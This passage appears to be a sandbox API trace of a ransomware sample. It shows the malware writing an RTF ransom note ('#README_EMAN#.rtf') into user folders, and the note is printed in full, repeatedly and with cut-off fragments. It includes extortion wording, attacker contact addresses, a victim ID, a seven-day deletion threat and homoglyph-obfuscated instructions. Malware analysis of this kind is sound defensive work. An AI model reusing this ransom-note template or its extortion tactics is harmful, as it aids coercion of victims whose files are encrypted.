COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0282.650] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef4b68, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nNFd5SUkifSx7ImNhbm9uaWN£\x0e", lpUsedDefaultChar=0x0) returned 8717 [0282.650] WriteFile (in: hFile=0x2cc, lpBuffer=0x1ef4b68*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef4b68*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0282.651] CloseHandle (hObject=0x2cc) returned 1 [0282.651] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\#readme_eman#.rtf")) returned 0xffffffff [0282.651] GetLastError () returned 0x2 [0282.651] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0282.652] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d 